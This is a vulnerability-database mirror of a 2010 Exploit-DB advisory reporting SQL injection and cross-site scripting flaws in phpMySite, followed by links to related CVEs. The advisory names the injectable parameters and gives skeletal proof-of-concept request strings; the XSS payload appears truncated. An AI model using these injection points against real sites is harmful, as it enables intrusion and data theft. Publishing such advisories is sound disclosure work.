Lucene search
CruxEDB-ID:11588HistoryFeb 27, 2010 - 12:00 a.m.
phpMySite - Cross-Site Scripting / SQL Injection
2010-02-2700:00:00
Crux
www.exploit-db.com
24
AI Score
7.4
Confidence
Low
=================================================================
[~] phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities
=================================================================
##########################################################
## Author: Crux
## Homepage: http://hack-tech.com
## Date: 2-27-2010
## Software Link: http://www.phpmysite.com/
## Version: N/A
##########################################################
[ SQLi ]
---------------------------------
// This vulnerability affects index.php
// Can be exploited VIA the GET variable 'action'
[#] Exploit / POC
index.php?action=${SQLINJECTIONHERE}&[email protected]
[ XSS ]
---------------------------------
// This vulnerability affects contact.php
// Can be exploited via the following POST variables:
// name, city, email, state, message
[#] Exploit / POC
name=Crux&city=1>">&state=NY&email=sample%40email%2Etst&[email protected]&[email protected]
=================================================================Related
cvelist
cvelist
CVE-2010-1091
2010-03-24 17:00:00
CVE-2010-1090
2010-03-24 17:00:00
prion
prion
Cross site scripting
2010-03-24 22:44:00
Sql injection
2010-03-24 22:44:00
nvd
nvd
CVE-2010-1091
2010-03-24 22:44:14
CVE-2010-1090
2010-03-24 22:44:14
cve
cve
CVE-2010-1090
2010-03-24 22:44:14
CVE-2010-1091
2010-03-24 22:44:14